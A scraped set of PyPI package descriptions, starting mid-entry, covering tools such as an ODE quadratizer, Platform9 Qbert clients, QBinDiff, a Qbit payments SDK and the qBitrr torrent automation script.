utilize the following pipeline:Input system -> Polynomial System -> Quadratic Systemand the transformations are calledpolynomializationandquadratizationaccordingly.The example system is not polynomial, so we use the most general method for achieving optimal monomial quadratization.# {T: 2} means than T can have a derivative of order at most two => T''quadr_system=polynomialize_and_quadratize(system,input_der_orders={T:2})ifquadr_system:quadr_system.print()Sample output:Introduced variables:\nw_0 = exp(-Ea/(Ru*T))\nw_1 = c1**0.2\nw_2 = c2**1.3\nw_3 = w_0*w_1\nw_4 = T'/T**2\nw_5 = T**(-2)\nw_6 = T'/T\nw_7 = 1/T\nw_8 = w_0*w_1*w_2/c1\nw_9 = w_0*w_1*w_2/c2\n\nc1' = -A*w_2*w_3\nc2' = -2*A*w_2*w_3\nc3' = A*w_2*w_3\nc4' = 2*A*w_2*w_3\nw_0' = Ea*w_0*w_4/Ru\nw_1' = -A*w_1*w_8/5\nw_2' = -13*A*w_2*w_9/5\nw_3' = -A*w_3*w_8/5 + Ea*w_3*w_4/Ru\nw_4' = T''*w_5 - 2*w_4*w_6\nw_5' = -2*w_5*w_6\nw_6' = T''*w_7 - w_6**2\nw_7' = -w_6*w_7\nw_8' = 4*A*w_8**2/5 - 13*A*w_8*w_9/5 + Ea*w_4*w_8/Ru\nw_9' = -A*w_8*w_9/5 - 3*A*w_9**2/5 + Ea*w_4*w_9/RuIntroduced variables are the optimal monomial quadratization.PapersOptimal Monomial Quadratization for ODE systems:arxiv,SpringerCitationIf you find this code useful in your research, please consider citing the above paper that works best for you."} +{"package": "qbeetle", "pacakge-description": "beetle (\u7532\u58f3\u866b)\u7b80\u4ecbbeetle\u662f\u4e00\u4e2aPyQt\u548cPyside\u9879\u76ee\u5f00\u53d1\u6846\u67b6\u3002\u53ef\u4ee5\u5e2e\u52a9\u4f60\u5feb\u901f\u7684\u521b\u5efa\u3001\u8fd0\u884c\u548c\u7f16\u8bd1\u9879\u76ee\uff0c\n\u5e76\u4e14\u8fd8\u5305\u542b\u4e00\u4e9b\u8f85\u52a9\u5f00\u53d1\u5de5\u5177\u6765\u63d0\u9ad8\u5f00\u53d1\u6548\u7387\u3002fbs\u662f\u4e00\u4e2a\u53e6\u5916\u4e00\u4e2a\u6846\u67b6\uff0c \u5b83\u4e3a\u6253\u5305\u3001\u521b\u5efa\u5b89\u88c5\u7a0b\u5e8f\u548c\u5bf9\u5e94\u7528\u7a0b\u5e8f\u8fdb\u884c\u7b7e\u540d\u63d0\u4f9b\u4e86\u5f3a\u5927\u7684\u73af\u5883\u3002 \u4f46\u662f\uff0cfbs\u7684\u5f00\u6e90\u7248\u672c\u652f\u6301\u7684python\u7248\u672c\u4e3a3.6\uff0c\n\u4ee5\u81f3\u4e8epython\u7684\u65b0\u7279\u6027\uff0c\u4ee5\u53ca\u5f88\u591a\u66f4\u65b0\u7248\u672c\u7684\u5305\u548c\u6a21\u5757\u90fd\u65e0\u6cd5\u4f7f\u7528\u3002beetle\u60f3\u89e3\u51b3\u8fd9\u4e9b\u95ee\u9898\uff0c\u5e76\u63d0\u4f9b\u4e86\u5f88\u591a\u65b0\u7684\u7279\u6027\u3002\u8fd8\u662f\u8981\u611f\u8c22fbs\uff0c \u5b83\u8fd8\u662f\u4e3aPyQt\u548cPyside\u9879\u76ee\u5f00\u53d1\u63d0\u4f9b\u4e86\u5f88\u591a\u7684\u904d\u5386\uff0cbeetle\u4e5f\u5728\u5f88\u591a\u65b9\u9762\u501f\u9274\u4e86fbs\u3002\u5f00\u53d1\u8ba1\u5212\u5f00\u53d1\u4e00\u4e2a\u5de5\u5177beetle, \u7c7b\u4f3c\u4e8efbs\uff0c\u9884\u8ba1\u5177\u5907\u5982\u4e0b\u529f\u80fd:template_list \u8d44\u6e90\u5e93\u4e2d\u7684\u9879\u76ee\u6a21\u677f\u5217\u8868update_template \u4ece Beetle \u7684\u5b98\u65b9\u9879\u76ee\u6a21\u677f\u5e93\u66f4\u65b0\u5230\u672c\u5730\u9879\u76ee\u6a21\u677f\u5e93add_template \u5411 Beetle \u6dfb\u52a0\u65b0\u7684\u5ba2\u6237\u5b9a\u4e49\u7684\u9879\u76ee\u6a21\u677fdelete_template \u5220\u9664 Beetle \u7684\u5ba2\u6237\u81ea\u5b9a\u4e49\u9879\u76ee\u6a21\u677f\u3002startproject \u65b0\u5efa\u3001\u521d\u59cb\u5316\u9879\u76eeui\u6587\u4ef6\u8f6cpy\u6587\u4ef6\u751f\u6210\u56fd\u9645\u5316\uff08i18n\uff09\u6240\u9700\u7684ts\u6587\u4ef6ts\u6587\u4ef6\u8f6cqmqrc \u6587\u4ef6\u66f4\u65b0qrc \u6587\u4ef6\u8f6cpy\u6587\u4ef6run \u4ece\u6e90\u4ee3\u7801\u8fd0\u884c\u5e94\u7528freeze, \u5c06\u4ee3\u7801\u7f16\u8bd1\u4e3a\u72ec\u7acb\u7684\u53ef\u6267\u884c\u6587\u4ef6(\u53ef\u9009PyInstaller\u6216nuitka)installer, \u4e3a\u5e94\u7528\u521b\u5efa\u5b89\u88c5\u7a0b\u5e8ftest, \u6267\u884c\u81ea\u52a8\u5316\u6d4b\u8bd5(\u57fa\u4e8epytest)clean, \u5220\u9664\u4ee5\u524d\u7684\u751f\u6210\u8f93\u51fa\u5b89\u88c5beetle \u53ef\u4ee5\u4ece PyPi \u901a\u8fc7 pip \u5b89\u88c5\uff1apip install qbeetle\u6587\u6863\u8bf7\u770b beetle\u4f7f\u7528\u6587\u6863"} +{"package": "qbert", "pacakge-description": "qberta dead simple task queue backed by postgresvery informal testing suggests a max performance around 100 jobs per second per worker on my machine.usageaddqbert.piccolo_appto yourAPP_REGISTRYas perthe documentation.seeexample.pyfor queue interaction examples."} +{"package": "qbertclient", "pacakge-description": "Platform9 Qbert clientThis implementation of the Qbert client is an amalgam of various implementations in Platform9's internal tooling.\nAt the moment the goal is to get something out as quickly as possible.How to installpip install qbertclientUsagefrom qbertclient import qbert\n\nqb = qbert.Qbert(token, 'https:///qbert/v3/)The client also exposes a simple Keystone client which allows users to get a Keystone token:from qbertclient import qbert\nfrom qbertclient import keystone\n\ndu_fqdn = \"endpoint.platform9.net\"\nusername = \"username@platform9.net\"\npassword = \"hunter2\"\nproject_name = \"service\"\n\nks = keystone.Keystone(du_fqdn, username, password, project_name)\ntoken = ks.get_token()\nproject_id = ks.get_project_id(project_name)\n\nqb = qbert.Qbert(token, \"https://{}/qbert/v3/{}\".format(du_fqdn, project_id))\nprint(qb.list_clusters())"} +{"package": "qbertconfig", "pacakge-description": "Fetches kubeconfig from qbert APIkubectl configcan be used used to manage kubeconfig files. However,\ngathering a kubeconfig file for a Platform9 Managed Kubernetes cluster is\na manual process today. This aims to solve that problem by downloading\nand merging clusters\u2019 kubeconfigs with existing kubeconfig files.InstallationIt\u2019s strongly recommended to use a python virtualenvpipinstallqbertconfigUsageqc[-h][-kKUBECONFIG][--namecluster_name][--uuidcluster_uuid][-c]Supported Operationsfetch- get a kubeconfig for a PMK clusterhelp- show this messagelist-clusters- list available PMK clusters in the target Platform9 Managed CloudProviding CredentialsQbertconfig uses theOpenstack SDKto perform authentication against a\nPlatform9 Cloud. Credentials can be provided in either aclouds.yamlfile,\nenvironment variables, or by using the--oscommand-line arguments. For more\ninformation, please refer to theofficial documentationExamplesource~/openstack.rcqcfetch--namedev-cluster-kdev-cluster.kcfg.ymlexportKUBECONFIG=$(pwd)/dev-cluster.kcfg.ymlkubeconfiggetnodes--contextdev-clusterkubeconfiggetpods-nfooFor more information on openstack rc files and how to generate them, seeInstalling Openstack CLI Clients.TestingRunning Testspipinstall-rrequirements.txtnosetests-v-dtests/Lintingflake8--excludeversioneer.pyHow it worksHere is the basic structure of a Kubeconfig:apiVersion:v1kind:Configpreferences:{}current-context:defaultclusters:[]contexts:[]users:[]Each of cluster, context, or user, has anameassociated with it.\nThis is the unique identifier for each object, and each context uses\nthese names to tie it all together.Each of these sections can be managed with thekubectl configcommand. [Documentation]This utility will fetch a fresh kubeconfig from the Qbert API, and merge\nit\u2019s details into the specified kubeconfig.With the fresh kubeconfig, the following sections are renamed to resolve\ncommon collisions when managing many PMK clouds.useris renamed tofqdn-usernameto align with unique\nkeystone environmentscontextis renamed to thecluster_nameclusteris renamed to thecluster_uuid"} +{"package": "qbf-index", "pacakge-description": "Quotient Bloom FiltersQuotient Bloom Filters (QBFs) are a probabilistic data structure used to test if an element is a member of a set. They are a variant of the conventional Bloom Filter (BF) that incorporate a hierarchical level structure to improve the accuracy of membership queries.Conventional Bloom FilterConventional Bloom Filters (BFs) are used to determine whether an element is a member of a set or not. They work by hashing the element to a set of positions in an array of bits. If all the bits at these positions are set to 1, then the element is considered to be a member of the set. However, if any of the bits are set to 0, then the element is definitely not a member of the set. BFs are designed to minimize the number of false negatives, which occur when a member is incorrectly identified as not being part of the set. They do so at the cost of allowing for a certain number of false positives, which occur when a non-member is incorrectly identified as being part of the set.Quotient Bloom FilterQBFs improve upon BFs by incorporating a hierarchical level structure that allows for a more fine-grained control over the probability of false positives. QBFs introduce the concept of \"levels\" in which each level consists of a set of Bloom Filters that store the number of times an element has been inserted. The maximum number of times an element can be inserted in a level is equal to the number of levels, and the number of levels determines the total number of bits allocated to each element.To query if an element is in the set, the QBF checks if all the bits for the element are set to 1 in all the levels. If all the bits are set to 1, then the element is considered to be a member of the set. However, if any of the bits are set to 0, then the element is not a member of the set. The use of levels allows for more control over the false positive rate. The probability of a false positive depends on the number of levels and the number of times the element has been inserted. As the number of levels and the number of insertions increase, the probability of a false positive decreases.Level MechanismThe level mechanism works by allocating more bits to an element as it is inserted more times. When an element is inserted, its hash values are computed and the corresponding bits in the bit array are incremented by 1 in all the levels. The maximum value for each bit is equal to the number of levels. When an element is queried for membership, the QBF checks if all the bits for the element are set to 1 in all the levels. If any of the bits are set to 0, the QBF returns that the element is not in the set.Use Case within Large Language Model GenerationQBFs can be used as an efficient mechanism for indexing and searching the massive data sets required for the training of large language models. These data sets consist of billions of tokens, and the use of conventional data structures can be prohibitive in terms of memory requirements and computational complexity. By using QBFs, the size of the index can be reduced by several orders of magnitude while maintaining a high level of accuracy in the search results. The hierarchical level structure allows for a more fine-grained control over the false positive rate, which is critical in ensuring the accuracy of the search results. Overall, QBFs provide an efficient and effective solution for indexing and searching massive data sets required for the training of large language models."} +{"package": "qbidolet-02-mai", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qbindiff", "pacakge-description": "QBinDiffQBinDiff is an experimental binary diffing tool addressing the diffing as aNetwork Alignement Quadratic Problem.But why developing yet another differ when Bindiff works well?Bindiff is great, no doubt about it, but we have no control on the diffing process. Also, it works\ngreat on standard binaries but it lacks flexibility on some corner-cases (embedded firmwares,\ndiffing two portions of the same binary etc...).A key idea of QBinDiff is enabling tuning the diffingprogrammaticallyby:writing its own featurebeing able to enforce some matchesemphasizing either on the content of functions (similarity) or the links between them (callgraph)In essence, the idea is to be able to diff by defining its own criteria which sometimes, is not the\ncontrol-flow and instructions but could for instance, be data-oriented.Last, QBinDiff as primarily been designed with the binary-diffing use-case in mind, but it can be\napplied to various other use-cases like social-networks. Indeed, diffing two programs boils down to\ndetermining the best alignment of the call graph following some similarity criterion.Indeed, solving this problem is APX-hard, that why QBinDiff uses a machine learning approach (more\nprecisely optimization) to approximate the best match.Like Bindiff, QBinDiff also works using an exported disassembly of program obtained from IDA.\nOriginally usingBinExport, it now also supportQuokkaas backend, which extracted files, are\nmore exhaustive and also more compact on disk (good for large binary dataset).[!NOTE]\nQBinDiff is an experimental tool for power-user where many parameters, features, thresholds\nor weights can be adjusted. Obtaining good results usually requires tuning these parameters.(Please note that QBinDiff does not intend to be faster than other differs, but rather being more flexible.)[!WARNING]\nQBinDiff graph alignment is very memory intensive (compute large matrices), it can fill RAM if not cautious.\nTry not diffing binaries larger than +10k functions. For large program use very high sparsity ratio (0.99).DocumentationThe documentation can be found on thediffing portalor can be manually built withpip install .[doc]\ncd doc\nmake htmlBelow you will find some sections extracted from the documentation. Please refer to the full\ndocumentation in case of issues.InstallationQBinDiff can be installed through pip with:pip install qbindiffAs some part of the algorithm are very CPU intensive the installation\nwill compile some components written in native C/C++.As depicted above, QBinDiff relies on some projects (also developed at Quarkslab):python-binexport, wrapper on the BinExport protobuf format.python-bindiff, wrapper around bindiff (used to write results as Bindiff databases)Quokka, another binary exported based on IDA. Faster than binexport and more exhaustive (thus diffing more relevant)Usage (command line)After installation, the binaryqbindiffis available in the path.\nIt takes in input two exported files and start the diffing analysis. The result can then\nbe exported in a BinDiff file format.\nThe default format for input files isBinExport,\nfor a complete list of backend loader look at the-l1, --loader1option in the help.\nThe complete command line options are:Usage: qbindiff [OPTIONS] \n\n QBinDiff is an experimental binary diffing tool based on machine learning technics, namely Belief propagation.\n\nOptions:\n -l1, --loader1 Loader type to be used for the primary. Must be one of these ['binexport', 'quokka',\n 'ida'] [default: binexport]\n -l2, --loader2 Loader type to be used for the secondary. Must be one of these ['binexport', 'quokka',\n 'ida'] [default: binexport]\n -f, --feature Features to use for the binary analysis, it can be specified multiple times.\n Features may be weighted by a positive value (default 1.0) and/or compared with a\n specific distance (by default the option -d is used) like this ::.\n For a list of all the features available see --list-features.\n -n, --normalize Normalize the Call Graph (can potentially lead to a partial matching). [default\n disabled]\n -d, --distance The following distances are available ['canberra', 'euclidean', 'cosine',\n 'jaccard_strong'] [default: canberra]\n -s, --sparsity-ratio FLOAT Ratio of least probable matches to ignore. Between 0.0 (nothing is ignored) to 1.0\n (only perfect matches are considered) [default: 0.75]\n -sr, --sparse-row Whether to build the sparse similarity matrix considering its entirety or processing\n it row per row\n -t, --tradeoff FLOAT Tradeoff between function content (near 1.0) and call-graph information (near 0.0)\n [default: 0.75]\n -e, --epsilon FLOAT Relaxation parameter to enforce convergence [default: 0.5]\n -i, --maxiter INTEGER Maximum number of iteration for belief propagation [default: 1000]\n -e1, --executable1 PATH Path to the primary raw executable. Must be provided if using quokka loader\n -e2, --executable2 PATH Path to the secondary raw executable. Must be provided if using quokka loader\n -o, --output PATH Write output to PATH\n -ff, --file-format [bindiff] The file format of the output file. Supported formats are [bindiff] [default:\n bindiff]\n -v, --verbose Activate debugging messages. Can be supplied multiple times to increase verbosity\n --version Show the version and exit.\n --arch-primary TEXT Force the architecture when disassembling for the primary. Format is\n 'CS_ARCH_X:CS_MODE_Ya,CS_MODE_Yb,...'\n --arch-secondary TEXT Force the architecture when disassembling for the secondary. Format is\n 'CS_ARCH_X:CS_MODE_Ya,CS_MODE_Yb,...'\n --list-features List all the available features\n -h, --help Show this message and exit.Library usageThe strength of qBinDiff is to be usable as a python library. The following snippet shows an example\nof loading to binexport files and to compare them using the mnemonic feature.fromqbindiffimportQBinDiff,Programfromqbindiff.featuresimportWeisfeilerLehmanfrompathlibimportPathp1=Program(Path(\"primary.BinExport\"))p2=Program(Path(\"secondary.BinExport\"))differ=QBinDiff(p1,p2)differ.register_feature_extractor(WeisfeilerLehman,1.0,distance='cosine')differ.process()mapping=differ.compute_matching()output={(match.primary.addr,match.secondary.addr)formatchinmapping}Contributing & ContributorsAny help, or feedback is greatly appreciated via Github issues, pull requests.Current:Robin DavidRiccardo MoriRoxane CohenPast:Alexis ChallandeElie MenginAll contributions"} +{"package": "qbiome", "pacakge-description": "Info:Draft link will be posted hereAuthor:ZeD@UChicagoDescription:Application of quasinets (https://pypi.org/project/quasinet/) for microbiome analysis for learning rules of organization, maturation, competition and succession in microbiome ecosystems.Documentation:https://zeroknowledgediscovery.github.io/qbiome/qbiome/index.htmlUsage:import qbiome\nfrom qbiome.data_formatter import DataFormatter\nfrom qbiome.quantizer import Quantizer\nfrom qbiome.qnet_orchestrator import QnetOrchestrator\nfrom qbiome.forecaster import Forecaster"} +{"package": "qbirthday", "pacakge-description": "QBirthday is a birthday reminder status icon.FeaturesSeveral backends available (CSV file, Lightning, MySQL databse).Extendable to other backends.iCalendar export.RequirementsQBirthday runs on Python >= 3.7.It requires PyQt5 and optionally depends on mysqlclient if a MySQL database is used as backend.InstallationEither as root or in a Python virtual environment:$ pip install qbirthdayTo use MySQL backend, install mysqlclient:$ pip install mysqlclientHistoryQBirthday is a Qt port of GBirthday, a GTK application.Project linksPyPI:https://pypi.python.org/pypi/marshmallowChangelog:https://github.com/lafrech/qbirthday/blob/master/CHANGELOG.rstIssues:https://github.com/lafrech/qbirthday/issuesLicenseQBirthday is distributed under GPLv2 license (see LICENSE file)."} +{"package": "qbism", "pacakge-description": "QBismpython tools for the budding quantum bettabilitarianInstallationpip install qbismNote thatqbismrelies onqutip!UsageLet's start off with a random density matrix:from qbism import *\nimport qutip as qt\nimport numpy as np\n\nd = 2\nrho = qt.rand_dm(d)We construct a random Weyl-Heisenberg IC-POVM, and get the magical quantum coherence matrix. We find the probabilities with respect to this POVM.povm = weyl_heisenberg_povm(qt.rand_ket(d))\nphi = povm_phi(povm)\np = dm_probs(rho, povm)\nprint(\"probs: %s\" % p)probs: [0.20215649 0.20215649 0.29784351 0.29784351]We can compare the classical probabilities (for a Von Neumann measurement after a POVM measurement whose outcome we are ignorant of) to the the quantum probabilities (in the case where we go directly to the Von Neumann measurement):H = qt.rand_herm(d)\nvn = [v*v.dag() for v in H.eigenstates()[1]]\n\nclassical_probs = conditional_probs(vn, povm) @ p\nquantum_probs = conditional_probs(vn, povm) @ phi @ p\n\nprint(\"classsical probs: %s\" % classical_probs)\nprint(\"quantum probs: %s\" % quantum_probs)\n\npost_povm_rho = sum([(e*rho).tr()*(e/e.tr()) for e in povm])\nassert np.allclose(classical_probs, [(v*post_povm_rho).tr() for v in vn])\nassert np.allclose(quantum_probs, [(v*rho).tr() for v in vn])classsical probs: [0.55802905 0.44197095]\nquantum probs: [0.65778315 0.34221685]Now let's get a SIC-POVM and explore time evolution:sic = sic_povm(d)\nsic_phi = povm_phi(sic)\nsic_p = dm_probs(rho, sic)\n\nU = qt.rand_unitary(d)\nevolved_sic = [U*e*U.dag() for e in sic]\nR = conditional_probs(evolved_sic, sic).T\n\ntime_evolved_sic_p = R @ sic_phi @ sic_p\nprint(\"time evolved probs: %s\" % time_evolved_sic_p)\nassert np.allclose(dm_probs(U*rho*U.dag(), sic), time_evolved_sic_p)time evolved probs: [0.20445193 0.20445193 0.29554807 0.29554807]We could also use:time_evolved_sic_p2 = povm_map([U], sic) @ sic_phi @ sic_p\nassert np.allclose(time_evolved_sic_p, time_evolved_sic_p2)Finally, let's check out partial traces:entangled = qt.rand_dm(4)\nentangled.dims = [[2,2],[2,2]]\n\npovm2 = weyl_heisenberg_povm(qt.rand_ket(2))\npovm4 = apply_dims(weyl_heisenberg_povm(qt.rand_ket(4)), [2,2])\nphi = povm_phi(povm4)\np = dm_probs(entangled, povm4)\n\nptrA = povm_map(partial_trace_kraus(0, [2,2]), povm4, povm2)\nptrB = povm_map(partial_trace_kraus(1, [2,2]), povm4, povm2)\n\nassert np.allclose(dm_probs(entangled.ptrace(0), povm2), ptrA @ phi @ p)\nassert np.allclose(dm_probs(entangled.ptrace(1), povm2), ptrB @ phi @ p)Check out the tutorial for the full story!Thanks tonbdev!"} +{"package": "qbit", "pacakge-description": "No description available on PyPI."} +{"package": "qbit-py-sdk", "pacakge-description": "qbit-python-sdkQbit \u6982\u5ff5\u5f00\u53d1\u8005 API \u65e8\u5728\u5141\u8bb8\u4f01\u4e1a\u4e0e Qbit \u7cfb\u7edf\u96c6\u6210\uff0c\u5e76\u8f7b\u677e\u5c06\u5176\u4f5c\u4e3a\u5176\u5de5\u4f5c\u6d41\u7a0b\u7684\u4e00\u90e8\u5206\u3002\u8be5 API \u5141\u8bb8\u5f00\u53d1\u8005\u4f7f\u7528\u3010\u5168\u7403\u8d26\u6237\u3011\u3001\u3010\u91cf\u5b50\u5361\u3011\u4e1a\u52a1\u7b49\u3002\u9879\u76ee\u72b6\u6001\u5f53\u524d\u7248\u672c1.0.0\u4e3a\u6b63\u5f0f\u7248\u672c\u3002\u6682\u65f6\u652f\u6301\u4e86 auth \u76f8\u5173\u7684\u63a5\u53e3\uff0c\u5176\u4ed6\u63a5\u53e3\u5e26\u540e\u7eed\u5b8c\u5584\uff0c\u540c\u65f6\u4e5f\u63d0\u4f9b\u4e86 Qbit Api \u6240\u9700\u7684 Post\u3001put\u3001delete\u3001get \u8bf7\u6c42\uff0c\u65b9\u4fbf\u4f7f\u7528\u8005\u66f4\u597d\u8c03\u7528\u5176\u4ed6\u63a5\u53e3\uff0c\u5177\u4f53\u4f7f\u7528\u8bf7\u770b\u4e0b\u9762\u4ee3\u7801\u793a\u4f8b\u3002\u6ce8\u610f\uff1a\u8bf7\u5546\u6237\u7684\u4e13\u4e1a\u6280\u672f\u4eba\u5458\u5728\u4f7f\u7528\u65f6\u6ce8\u610f\u7cfb\u7edf\u548c\u8f6f\u4ef6\u7684\u6b63\u786e\u6027\u548c\u517c\u5bb9\u6027\uff0c\u4ee5\u53ca\u5e26\u6765\u7684\u98ce\u9669\u3002\u73af\u5883\u8981\u6c42Python 3.7+\u5b89\u88c5\u6700\u65b0\u7248\u672c\u5df2\u7ecf\u5728pypi\u53d1\u5e03\u3002pip install qbit-py-sdk\u6216\u8005pipenv install qbit-py-sdk\u4f7f\u7528importqbit_py_sdkasQbitqbit=Qbit.QbitClient(\"qbit1f6efee44ceb8ca2\",\"8f70d42a1393802aebf567be27a47879\",\"https://api-global.qbitnetwork.com\")\u540d\u8bcd\u89e3\u91caClient\uff0c\u5408\u4f5c\u4f19\u4f34\u5728 Qbit \u6211\u4eec\u79f0\u4e4b\u4e3a Client\u3002Account\uff0c \u5408\u4f5c\u4f19\u4f34\u7684\u5ba2\u6237\u5728 Qbit \u6211\u4eec\u79f0\u4e4b\u4e3a AccountclientId\uff0c\u5546\u6237 id\uff0c\u8bf7\u8054\u7cfb\u6211\u4eec\u7533\u8bf7\u3002clientSecret\uff0c\u5546\u6237\u5bc6\u94a5\uff0c\u7528\u4e8e\u7b7e\u540d\uff0c\u8bf7\u8054\u7cfb\u6211\u4eec\u7533\u8bf7\u3002\u5f00\u59cb\u83b7\u53d6 access tokencodeRes=qbit.get_code(state='324',redirect_uri='')res=qbit.get_access_token(codeRes.code)print(res)\u5237\u65b0 access tokenres=qbit.refresh_access_token(\"refreshToken\")print(res)\u8c03\u7528\u5176\u4ed6\u63a5\u53e3\u793a\u4f8b# \u8fd4\u56de\u503c status \u5728 200 - 300 \u5185\u8868\u793a\u8bf7\u6c42\u6b63\u5e38params={\"id\":\"5d890eda-16aa-4760-90af-3d60837f5616\",\"limit\":10}res=qbit.config(\"access_token\").get_request(\"https://api-global.qbitnetwork.com/open-api/v1/budget\",**params)\u654f\u611f\u4fe1\u606f\u52a0\u89e3\u5bc6\u52a0\u5bc6-HmacSHA256fromqbit_py_sdkimportencryptHmacSHA256data={\"id\":\"ee74c872-8173-4b67-81b1-5746e7d5ab88\",\"accountId\":None,\"holderId\":\"d2bd6ab3-3c28-4ac7-a7c4-b7eed5eee367\",\"currency\":\"USD\",\"settlementCurrency\":None,\"counterparty\":\"SAILINGWOOD;;US;1800948598;;091000019\",\"transactionAmount\":11,\"fee\":0,\"businessType\":\"Inbound\",\"status\":\"Closed\",\"transactionTime\":\"2021-11-22T07:34:10.997Z\",\"transactionId\":\"124d3804-defa-4033-9f30-1d8b0468e506\",\"clientTransactionId\":None,\"createTime\":\"2021-11-22T07:34:10.997Z\",\"appendFee\":0,}res=encryptHmacSHA256(\"25d55ad283aa400af464c76d713c07ad\",**data)print(res==\"8287d5539c03918c9de51176162c2bf7065d5a8756b014e3293be1920c20d102\")\u8054\u7cfb\u6211\u4eec\u5982\u679c\u4f60\u53d1\u73b0\u4e86BUG\u6216\u8005\u6709\u4efb\u4f55\u7591\u95ee\u3001\u5efa\u8bae\uff0c\u8bf7\u901a\u8fc7 issue \u8fdb\u884c\u53cd\u9988\u3002\u4e5f\u6b22\u8fce\u8bbf\u95ee\u6211\u4eec\u7684\u5b98\u7f51\u3002"} +{"package": "qBitrr", "pacakge-description": "A simple script to monitorQbitand communicate withRadarrandSonarrJoin theOfficial Discord Serverfor help.FeaturesMonitor qBit for Stalled/bad entries and delete them then blacklist them on Arrs (Option to also trigger a re-search action).Monitor qBit for completed entries and tell the appropriate Arr instance to import it ( 'DownloadedMoviesScan' or 'DownloadedEpisodesScan' commands).Skip files in qBit entries by extension, folder or regex.Monitor completed folder and cleans it up.Usesffprobeto ensure downloaded entries are valid media.Trigger periodic Rss Syncs on the appropriate Arr instances.Trigger Queue update on appropriate Arr instances.Search requests fromOverseerrorOmbi.Auto add/remove trackersSet per tracker valuesThis section requires the Arr databases to be locally available.Monitor Arr's databases to trigger missing episode searches.Customizable year range to search for (at a later point will add more option here, for example search whole series/season instead of individual episodes, search by name, category etc).Important mentionsSome things to know before using it.Qbitrr works best with qBittorrent 4.3.9You need to run theqbitrr --gen-configmove the generated file to~/.config/qBitManager/config.toml(~ is your home directory, i.eC:\\Users\\{User})I haveSonarrandRadarrboth setup to add tags to all downloads.I have qBit setup to have to create sub-folder for downloads and for the download folder to\nuse subcategories.Install the requirements runpython -m pip install qBitrr(I would recommend in a dedicatedvenvbut that's out of scope.Alternatively:Download on thelatest releaseRun the scriptMake sure to update the settings in~/.config/qBitManager/config.tomlActivate your venvRunqbitrrAlternatively:Unzip the downloaded release and run itHow to update the scriptActivate your venvRunpython -m pip install -U qBitrrAlternatively:Download on thelatest releaseContributionsI'm happy with any PRs and suggested changes to the logic I just put it together dirty for my own use case.Example behaviourDocker ImageThe docker image can be foundhereDocker Composeversion:\"3\"services:qbitrr:image:qbitrruser:1000:1000#Requiredtoensuretehcontainerisrunastheuserwhohaspermstoseethe2mountpointsandtheabilitytowritetotheCompletedDownloadFoldermounttty:true#Ensuretheoutputofdocker-composelogsqbitrrareproperlycolored.restart:unless-stopped#networks:ThiscontainerMUSTshareanetworkwithyourSonarr/Radarrinstancesenviroment:TZ:Europe/Londonvolumes:-/etc/localtime:/etc/localtime:ro-/path/to/appdata/qbitrr:/config#Allqbitrrfilesarestoredinthe`/config`folderwhenusingadockercontainer-/path/to/sonarr/db:/sonarr.db/path/in/container:ro#Thisisonlyneededifyouwantepisodesearchhandling:romeansitisonlyevermountedasaread-onlyfolder,thescriptneverneedsmorethanreadaccess-/path/to/radarr/db:/radarr.db/path/in/container:ro#Thisisonlyneededifyouwantmoviesearchhandling,:romeansitisonlyevermountedasaread-onlyfolder,thescriptneverneedsmorethanreadaccess-/path/to/completed/downloads/folder:/completed_downloads/folder/in/container:rw#ThescriptwillALWAYSrequirewritepermissioninthisfolderifmounted,thisfolderisusedtomonitorcompleteddownloadsandifnotpresentwillcausethescripttoignoredownloadedfilemonitoring.#Nowjusttomakesureitisclean,whenusingthisscriptinadockeryouwillneedtoensureyouconfig.tomlvaluesreflectthemountedfolders.##Forexample,foryourSonarr.DatabaseFilevalueusingthevaluesaboveyou'dadd#DatabaseFile=/sonarr.db/path/in/container/sonarr.db#Becausethisiswhereyoumounteditto#ThesamewouldapplytoSettings.CompletedDownloadFolder#e.gCompletedDownloadFolder=/completed_downloads/folder/in/containerlogging:#thisscriptwillgenerateaLOToflogs-soitisuptoyoutodecidehowmuchofityouwanttostoredriver:\"json-file\"options:max-size:\"50m\"max-file:3depends_on:#NotneededbutthisensuresqBitrronlystartsifthedependenciesareupandrunning-qbittorrent-radarr-1080p-sonarr-1080p-animarr-1080p-overseerrImportant mentions for dockerThe script will always expect a completed config.toml fileWhen you first start the container a \"config.rename_me.toml\" will be added to/path/to/appdata/qbitrrMake sure to rename it to 'config.toml' then edit it to your desired values"} +{"package": "qBitrr2", "pacakge-description": "qBitrrA simple script to monitorqBitand communicate withRadarrandSonarrNoticeI am starting development on qBitrr+ which will be C# based for better overall performance and will also include a WebUI for better refined control on setting and what to search/upgrade etc. Hoping this will be the be all and end all application to manage your Radarr/Sonarr, Overseerr/Ombi and qBittorrent instances in one UI. This is still in it's very early stages and will likely be a couple months before a concrete beta is rolled out (from start of February 2024). Once I have something solid I will remove this notice and add a link to the new qBitrr+, in the meantime I will be sharing periodic updates on myPatreonFeaturesMonitor qBit for Stalled/bad entries and delete them then blacklist them on Arrs (Option to also trigger a re-search action).Monitor qBit for completed entries and tell the appropriate Arr instance to import it:qbitrr DownloadedMoviesScanfor Radarrqbitrr DownloadedEpisodesScanfor SonarrSkip files in qBit entries by extension, folder or regex.Monitor completed folder and clean it up.Usage offfprobeto ensure downloaded entries are valid media.Trigger periodic Rss Syncs on the appropriate Arr instances.Trigger Queue update on appropriate Arr instances.Search requests fromOverseerrorOmbi.Auto add/remove trackersSet per tracker valuesSonarr v4 supportRadarr v4 and v5 supportMonitor Arr's to trigger missing episode searches.Searches Radarr missing movies based on Minimum AvailabilityCustomizable searching by series or singular episodesOptionally searches year by year is ascending or descending order (config option available)Search for CF Score unmet and cancel torrents base on CF Score or Quality unmet searchSet minimum free space in download directory and pause torrent downloads accordinglyTested withSome things to know before using it.qBittorrent >= 4.5.xSonarrandRadarrboth setup to add tags to all downloads.qBit set to create sub-folders for tag.UsageNativepython -m pip install qBitrr2(I would recommend in a dedicatedvenvbut that's out of scope.Alternatively:Download thelatest releaseRun the scriptActivate your venvRunqBitrr2to generate a config fileEdit the config file (located at~/config/config.toml(~ is your current directory)RunqBitrr2if installed through pip again to start the scriptAlternatively:Unzip the downloaded release and run itRunqBitrrto generate a config fileEdit the config file (located at~/config/config.toml(~ is your current directory)RunqBitrrif installed through pip again to start the scriptHow to update the scriptActivate your venvRunpython -m pip install -U qBitrr2Alternatively:Download on thelatest releaseUnzip the downloaded release and run itRunqBitrrto generate a config fileEdit the config file (located at~/config/config.toml(~ is your current directory)RunqBitrrif installed through pip again to start the scriptThere is no auto-update feature, you will need to manually download the latest release and replace the old one.DockerDocker ImageThe docker image can be found 